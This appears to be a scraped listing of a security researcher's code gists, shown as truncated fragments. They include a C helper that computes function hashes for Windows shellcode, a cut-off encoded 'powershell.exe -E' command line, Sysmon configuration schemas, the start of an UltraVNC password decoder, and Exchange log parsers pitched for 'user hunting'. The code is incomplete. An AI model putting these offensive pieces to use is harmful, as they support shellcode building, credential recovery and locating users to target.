leechristensen / PrintFunctionHashes.c
Last active June 19, 2020 13:35
Calculates function hashes for use in Matt Graeber's C to Shellcode project
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
// Calculates function hashes for use in Matt Graeber's C to Shellcode project
// See http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html
//
// Usage: PrintFunctionHashes.exe user32.dll | findstr /i messagebox
// This compiles to a ROR instruction
PS C:\> $Command = 'powershell.exe -E "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
leechristensen / Sysmon4.0XmlConfigSchema.xml
Created April 28, 2016 23:05
Sysmon v4.0 XML Configuration Schema
<!DOCTYPE Sysmon [<!ELEMENT Sysmon (EventFiltering|HashAlgorithms)*>
<!ATTLIST Sysmon schemaversion CDATA #REQUIRED>
<!ELEMENT EventFiltering (ProcessCreate|FileCreateTime|NetworkConnect|ProcessTerminate|DriverLoad|ImageLoad|CreateRemoteThread|RawAccessRead)*>
<!ELEMENT ProcessCreate (UtcTime|ProcessGuid|ProcessId|Image|CommandLine|CurrentDirectory|User|LogonGuid|LogonId|TerminalSessionId|IntegrityLevel|Hashes|ParentProcessGuid|ParentProcessId|ParentImage|ParentCommandLine)*>
<!ATTLIST ProcessCreate onmatch (include|exclude) #IMPLIED>
<!ATTLIST ProcessCreate default (include|exclude) #IMPLIED>
<!ELEMENT UtcTime (#PCDATA)*>
<!ATTLIST UtcTime condition CDATA "is">
<!ELEMENT ProcessGuid (#PCDATA)*>
<!ATTLIST ProcessGuid condition CDATA "is">
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;
namespace UltraVNCPasswordDecoder
{
class Program
{
public static string ByteArrayToHex(byte[] bytes)
leechristensen / ParseEwsExchangeLogs.ps1
Created January 27, 2016 18:09
Extracts the email and client IP address from Exchange's EWS logs. Useful for user hunting.
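# Root of the EWS logs. The Exchange install location is the production
# location; "." is the working-directory override used when the logs have
# been copied off the server. Keep exactly one of the two active (the
# original assigned both, so the install-path value was dead).
#$EWSLogPath = "$($env:exchangeinstallpath)\Logging\EWS\"
$EWSLogPath = "."
# How many of the most recently written log files to parse
$NumberOfLogs = 10
# Full paths of the newest $NumberOfLogs log files, newest first
$RecentLogs = Get-ChildItem -Path "$EWSLogPath\*.log" |
    Sort-Object -Property LastWriteTime -Descending |
    Select-Object -First $NumberOfLogs -ExpandProperty FullName
# Accumulates the records extracted by the loop below (loop body not shown here)
$UserLogons = @()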
foreach($Log in $RecentLogs)
{
$LogFile = Get-Content $Log | select -Skip 5
leechristensen / ParseRPCClientAccessLogs.ps1
Created January 27, 2016 17:38
Parses Exchange's RPC Client Access Logs to get client usernames/IP addresses.
# Author: Lee Christensen (@tifkin_)
#$RPClientLogDir = "$($env:exchangeinstallpath)\Logging\RPC Client Access\"
# Directory holding the RPC Client Access logs; "." reads them from the
# working directory (the Exchange install-path form is commented out above).
$RPClientLogDir = "."
# Number of most-recently-written log files to look at
$NumberOfLogs = 100
# Newest $NumberOfLogs log files as full paths, most recent first
$RecentLogs = Get-ChildItem -Path "$RPClientLogDir\*.log" |
    Sort-Object -Property LastWriteTime -Descending |
    Select-Object -First $NumberOfLogs -ExpandProperty FullName
# Filled by the per-log loop that follows (loop body not shown here)
$UserLogons = @()
foreach($Log in $RecentLogs)
{
Pulled it using strings.exe..... :)
<!DOCTYPE Sysmon [<!ELEMENT Sysmon (EventFiltering|HashAlgorithms)*>
<!ATTLIST Sysmon schemaversion CDATA #REQUIRED>
<!ELEMENT EventFiltering (ProcessCreate|FileCreateTime|NetworkConnect|ProcessTerminate|DriverLoad|ImageLoad|CreateRemoteThread)*>
<!ELEMENT ProcessCreate (SequenceNumber|UtcTime|ProcessGuid|ProcessId|Image|CommandLine|CurrentDirectory|User|LogonGuid|LogonId|TerminalSessionId|IntegrityLevel|Hashes|ParentProcessGuid|ParentProcessId|ParentImage|ParentCommandLine)*>
<!ATTLIST ProcessCreate onmatch (include|exclude) #IMPLIED>
<!ATTLIST ProcessCreate default (include|exclude) #IMPLIED>
<!ELEMENT SequenceNumber (#PCDATA)*>
<!ATTLIST SequenceNumber condition CDATA "is">